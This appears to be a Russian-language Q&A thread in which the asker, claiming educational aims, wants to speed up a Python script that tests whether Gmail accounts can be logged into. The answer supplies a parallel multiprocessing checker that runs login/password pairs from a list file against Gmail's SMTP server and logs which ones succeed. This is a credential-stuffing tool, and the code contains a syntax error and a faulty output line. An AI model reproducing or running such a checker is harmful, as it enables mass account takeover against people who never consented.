# Ускорить проверку авторизации Email (многочисленные login)

Tags: python, email, smtp, smtplib

Учу Питон. Сейчас пишу простой парсер email адресов (чисто в образовательных целях, разумеется). Сейчас проверка на валидность осуществляется вот так:

```
import smtplib

smtp_host = 'smtp.gmail.com'
smtp_tls_port = 587
server = smtplib.SMTP(smtp_host, smtp_tls_port)
server.starttls()
try:
  server.login('login@gmail.com', 'password')
  print('Email is valid')
except:
  print('Email is not valid')
```

Собственно, работает все отлично. Но вот процесс парсинга происходит достаточно медленно. Как можно его ускорить(сделать без использования `try` и `except`)?   Скажем, ввести какую-нибудь переменную `Auth`, которая в зависимости от успеха авторизации будет равняться `True` или `False`.

Comment: Для начала уточните, что такое валидность в вашем понимании?

Comment: Валидная почта значит, что на почту получилось зайти, а не валидная, соответственно значит, что зайти не получилось.

Comment: Тогда никак не ускорить, всё упирается в скорость интернета и производительность почтового сервера

Comment: Если email адресов много и они на разных серверах, то можно проверять одновременно несколько и тем самым немножко ускорить, но принципиально это ничего не поменяет (а за частые запросы сервер и забанить может, если захочет)

Comment: А как можно одновременно проверять сразу несколько?

Comment: @andreymal - в восемь потоков можно)

Comment: то что не можете login() выполнить может от настроек учётной записи зависеть (читайте сообщение об ошибке от сервера)

Comment: связанный вопрос [Brute force HTTP with Python](https://codereview.stackexchange.com/q/12659/6143) Кратко: попробуйте повторно использовать соединения, выполняйте несколько соединений одновременно: [пример кода](https://gist.github.com/zed/0a8860f4f9a824561b51)

Answer (score 0):

Примерно таким способом можно запустить обработку паралельно:

```
from multiprocessing import Pool
import smtplib

smtp_host = 'smtp.gmail.com'
smtp_tls_port = 587


def init():
    global server
    server = smtplib.SMTP(smtp_host, smtp_tls_port)
    server.starttls()

def worker(params):
    login, password = params
    try:
        ret = server.login(login, password)
        return login, password, ret
    except Exception as e:
        print e


def generator():
    with open('list.txt','r') as f:
        for line in f:
            yield line.split()

pool = Pool(8, initializer=init)

with open('parsed','w') as f: 
    for answer in pool.imap_unordered(worker, generator(), 4))):
        f.write(' '.join(str(answer)) + '\n')
        f.flush()
```

В восемь потоков с восьми конектов по кусками по 4 и записью ответов в файл по мере обработки.

Если почтовые сервера разные, то то что в инит перенесите в воркер. В таком случае глобальный сервер не нужен, но медленней будет работать из-за того что на каждый запрос создается новое ссл соединение.